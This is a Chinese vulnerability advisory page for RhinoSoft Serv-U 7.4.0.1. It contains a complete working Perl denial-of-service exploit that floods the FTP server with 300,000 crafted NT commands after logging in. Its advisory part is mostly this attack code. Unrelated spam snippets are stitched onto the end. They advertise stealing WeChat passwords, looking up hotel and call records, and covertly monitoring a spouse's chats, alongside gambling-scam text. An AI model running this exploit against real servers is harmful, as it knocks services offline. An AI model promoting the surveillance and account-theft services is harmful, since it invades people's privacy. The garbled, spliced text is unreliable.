影响版本:
RhinoSoft Serv-U 7.4.0.1
漏洞描述:
BUGTRAQ ID: 34127
Serv-U FTP是一款FTP服务程序。
如果远程攻击者向Serv-U FTP服务器发送特制 *** NT请求的话,就可以导致服务器停止响应。<*参考
Jonathan Salwan (submit@shell-storm.org)
*>
SEBUG安全建议:
厂商补丁:
RhinoSoft
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.serv-u.com/
测试 *** :
[www.sebug.net]
本站提供程序( *** )可能带有攻击性,仅供安全研究与教学之用,风险自负!
#!/usr/bin/perl
# Soft : FTP Serv-U
# Version : v7.4.0.1
#
# Denial of Service in Serv-u up to 7.4.0.1 (no crash)
# Just the server is saturated, it stops responding.
#
# Author: Jonathan Salwan
# Mail: submit [AT] shell-storm.org
# Web: http://www.shell-storm.org
use IO::Socket;
print "[+] Author : Jonathan Salwan \n";
print "[+] Soft: FTP Serv-U\n";
if (@ARGV < 3)
{
print "[*] Usage: <serv-u.pl> <host> <port>\n";
print "[*] Exemple: serv-u.pl 127.0.0.1 21 jonathan toto\n";
exit;
}
$ip = $ARGV[0];
$port = $ARGV[1];
$user = $ARGV[2];
$pass = $ARGV[3];
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$ip", PeerPort => "$port") || die "\n[-] Connecting: Failed!\n";
print "\n[+] Connecting: Ok!\n";
print "[+] Sending request...\n";
$evil = " *** NT\r\n" x 300000;
$after = "\x2A\x2A";
print $socket "USER $user\r\n";
print $socket "PASS $pass.$after\r\n";
print $socket "$evil";
sleep(1);
close($socket);
print "[+]Done! the server is saturated.\n";
其实比起聊天记录删除最好的解决方式是把好友删除,这样的恢复机遇是大一些的,而如果你聊天记录删除了,那你只能用软件。因为如果说你是把人家的好友删除了,你还可以在朋友圈里找到这个人发的消息,然后或者说你通...
往事被黑两种情况,第一账号冻结!就是你已经不能登陆了, 第二种可以登陆可以投注不能出款!就是你还可以登陆进去投注但是不能出款, 客服会告诉你各种理由:单注异常,单注审核,出款端口维护,财务审核等等...
酒店会私自查顾客信息吗(怎么样查酒店住房记录)专业盗取微信密码,开房查询,通话记录查询,查询微信聊天记录,非常靠谱!智慧酒店未来的发展趋势与阿里的现状如出一辙,行业前景渺茫,但智慧酒店的发展模式不同,...
网络公开数据显示:从年初至2月中旬即疫情高峰期,短短一个月的时间,13家在线教育相关企业的市值已经累计上涨近800亿米。 再有,据市场研究机构咨询的数据显示:近几年,在线教育市场一直以近20%...
现在几乎每个人都有微信,在社交圈子里,微信已经成为最受欢迎的社交应用,在全国拥有近10亿用户。 微信怎样重新设置密码 1.但是我们享受了这个应用给我们带来的便利,我们也对此负责吗?例如,我们必须保...
怎么查看我老公的微信聊天记录呢 如何监控老公微信微信内容信息 怎么查看我老公的微信聊天记录呢 如何监控老公微信微信内容信息 DDos 攻击自打出现以后,就成为最难防御的攻击方式。仅仅在过去的一年里...